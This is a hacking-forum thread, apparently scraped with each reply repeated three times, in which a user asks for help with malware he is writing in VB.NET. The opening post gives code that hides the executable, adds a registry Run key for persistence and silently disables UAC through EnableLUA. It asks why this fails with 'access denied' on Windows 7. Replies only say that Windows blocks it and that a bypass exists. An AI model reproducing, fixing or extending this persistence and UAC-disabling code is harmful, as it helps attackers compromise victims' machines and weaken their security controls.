Login Register






Thread Rating:
  • 0 Vote(s) - 0 Average


UAC error (VB.NET) filter_list
Author
Message
UAC error (VB.NET) #1
Hey guys,

I'm working on new malware in VB.NET , and I faced a big problem Sad . I've added stealth function to the malware , using this code :

Code:
Dim filepath As String = Application.ExecutablePath
    Dim newfilepath As String = "C:\file.exe"
    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        System.IO.File.Move(filepath, newfilepath)
        System.IO.File.SetAttributes(newfilepath, IO.FileAttributes.Hidden)
         System.IO.File.SetAttributes(newfilepath, IO.FileAttributes.system)
        Shell("Reg add HKLM\Software\Microsoft\Windows\Currentversion\Run /v sys32 /d C:\file.exe /t REG_SZ /f")
        Shell("Reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f", vbHidden)

the code moves the application to a new path , change it Attributes and create the above registery keys (startup & disable UAC ) . It works fine on windows xp , but under windows 7 / vista it says " access to path is denied" , so I've changed the manifest requested execution level to "requireAdministrator" , so when it's launched UAC pops out and when the user clicks yes , It will function properly and it disables UAC on the next restart . But the problem is : when the tool starts up again , it says again " access to path is denied" , in another words : It doesn't work under UAC disables machine , so how can i solve this problem ?

and thanks very much in advance .

Reply

RE: UAC error (VB.NET) #2
Well its simple, Microsoft is aware of this possible way of infecting users and won't let an program disable UAC.
Staff will never ever ask you for your personal information.
We know everything about you anyway.

Reply

RE: UAC error (VB.NET) #3
Well its simple, Microsoft is aware of this possible way of infecting users and won't let an program disable UAC.
Staff will never ever ask you for your personal information.
We know everything about you anyway.

Reply

RE: UAC error (VB.NET) #4
Well its simple, Microsoft is aware of this possible way of infecting users and won't let an program disable UAC.
Staff will never ever ask you for your personal information.
We know everything about you anyway.

Reply

RE: UAC error (VB.NET) #5
You misunderstood the problem . The problem is : If UAC enabled , UAC will pop up when the malware is executed , thats can't be changed , but the malware will be able to disable UAC through the registry key (it works ) . When UAC is disabled, the malware should work directly without UAC permission since it's disabled , but what i get is access denied .

Reply

RE: UAC error (VB.NET) #6
You misunderstood the problem . The problem is : If UAC enabled , UAC will pop up when the malware is executed , thats can't be changed , but the malware will be able to disable UAC through the registry key (it works ) . When UAC is disabled, the malware should work directly without UAC permission since it's disabled , but what i get is access denied .

Reply

RE: UAC error (VB.NET) #7
You misunderstood the problem . The problem is : If UAC enabled , UAC will pop up when the malware is executed , thats can't be changed , but the malware will be able to disable UAC through the registry key (it works ) . When UAC is disabled, the malware should work directly without UAC permission since it's disabled , but what i get is access denied .

Reply

RE: UAC error (VB.NET) #8
(01-18-2013, 05:19 PM)th3l33t Wrote: You misunderstood the problem . The problem is : If UAC enabled , UAC will pop up when the malware is executed , thats can't be changed , but the malware will be able to disable UAC through the registry key (it works ) . When UAC is disabled, the malware should work directly without UAC permission since it's disabled , but what i get is access denied .

Well obviously the UAC disable doesn't work when you get that message. And there is a way to bypass UAC.
Staff will never ever ask you for your personal information.
We know everything about you anyway.

Reply

RE: UAC error (VB.NET) #9
(01-18-2013, 05:19 PM)th3l33t Wrote: You misunderstood the problem . The problem is : If UAC enabled , UAC will pop up when the malware is executed , thats can't be changed , but the malware will be able to disable UAC through the registry key (it works ) . When UAC is disabled, the malware should work directly without UAC permission since it's disabled , but what i get is access denied .

Well obviously the UAC disable doesn't work when you get that message. And there is a way to bypass UAC.
Staff will never ever ask you for your personal information.
We know everything about you anyway.

Reply

RE: UAC error (VB.NET) #10
(01-18-2013, 05:19 PM)th3l33t Wrote: You misunderstood the problem . The problem is : If UAC enabled , UAC will pop up when the malware is executed , thats can't be changed , but the malware will be able to disable UAC through the registry key (it works ) . When UAC is disabled, the malware should work directly without UAC permission since it's disabled , but what i get is access denied .

Well obviously the UAC disable doesn't work when you get that message. And there is a way to bypass UAC.
Staff will never ever ask you for your personal information.
We know everything about you anyway.

Reply







Users browsing this thread: 1 Guest(s)